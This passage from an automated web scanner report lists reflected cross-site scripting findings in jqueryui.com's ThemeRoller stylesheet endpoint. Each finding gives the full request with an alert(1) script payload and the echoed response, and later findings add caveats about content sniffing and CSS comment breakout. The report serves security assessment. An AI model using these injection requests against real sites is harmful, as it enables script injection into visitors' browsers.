The value of the bgImgOpacityDefault request parameter is copied into the HTML document as plain text between tags. The payload d8c21<script>alert(1)</script>34a957472a0 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35d8c21<script>alert(1)</script>34a957472a0&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:33 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
reContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35d8c21<script>alert(1)</script>34a957472a0&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c
...[SNIP]...

1.190. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityError request parameter is copied into the HTML document as plain text between tags. The payload 8c30a<script>alert(1)</script>8f51bf51bab was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958c30a<script>alert(1)</script>8f51bf51bab&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:09 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=958c30a<script>alert(1)</script>8f51bf51bab&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em;
...[SNIP]...

1.191. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the HTML document as plain text between tags. The payload c2cf2<script>alert(1)</script>6fc6ab53cc7 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15c2cf2<script>alert(1)</script>6fc6ab53cc7&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15c2cf2<script>alert(1)</script>6fc6ab53cc7&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorCont
...[SNIP]...

1.192. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the HTML document as plain text between tags. The payload 20da6<script>alert(1)</script>148b59b0503 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=5520da6<script>alert(1)</script>148b59b0503&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:00 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
eActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=5520da6<script>alert(1)</script>148b59b0503&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.193. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the HTML document as plain text between tags. The payload adddf<script>alert(1)</script>efcd2d69d27 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60adddf<script>alert(1)</script>efcd2d69d27&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
tureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60adddf<script>alert(1)</script>efcd2d69d27&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a0
...[SNIP]...

1.194. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied unmodified into the application's response. The payload c8796<script>alert(1)</script>e82c1fa3989 was submitted in the bgImgOpacityOverlay parameter and was echoed verbatim; the legitimate value is a percentage (20 in the request below), so a numeric check would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL (the closing */ is visible in the snippet below). A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20c8796<script>alert(1)</script>e82c1fa3989&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:22 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
extureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20c8796<script>alert(1)</script>e82c1fa3989&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/*
...[SNIP]...

1.195. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityShadow request parameter is copied unmodified into the application's response. The payload 3bbcf<script>alert(1)</script>5c2068cb67e was submitted in the bgImgOpacityShadow parameter and was echoed verbatim; the legitimate value is a percentage (10 in the request below), so a numeric check would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL (the closing */ is visible in the snippet below). A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=103bbcf<script>alert(1)</script>5c2068cb67e&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=103bbcf<script>alert(1)</script>5c2068cb67e&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebu
...[SNIP]...

1.196. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureActive request parameter is copied unmodified into the application's response. The payload 7943c<script>alert(1)</script>5b85df05f4e was submitted in the bgTextureActive parameter and was echoed verbatim; the legitimate value is a texture file name (05_inset_soft.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL. A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png7943c<script>alert(1)</script>5b85df05f4e&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:51 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17800


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png7943c<script>alert(1)</script>5b85df05f4e&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404
...[SNIP]...

1.197. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureContent request parameter is copied unmodified into the application's response. The payload 23ac2<script>alert(1)</script>7ab3aebd3a was submitted in the bgTextureContent parameter and was echoed verbatim; the legitimate value is a texture file name (12_gloss_wave.png in the request below), so an allow-list of the shipped texture names would have rejected it.

This proof of concept demonstrates that arbitrary markup can be injected into the response body. Note, however, that the response is served with Content-Type: text/css and no X-Content-Type-Options header, and the reflection sits inside the CSS comment at the top of the stylesheet that echoes the full ThemeRoller URL. A browser that honours the declared type will not parse the <script> tag, so script execution depends on the client sniffing the body as HTML; the High rating should be confirmed against the browsers in scope before it is accepted. A value containing */ would also close that comment, and whatever follows would be parsed as CSS by any page that loads this stylesheet.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png23ac2<script>alert(1)</script>7ab3aebd3a&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
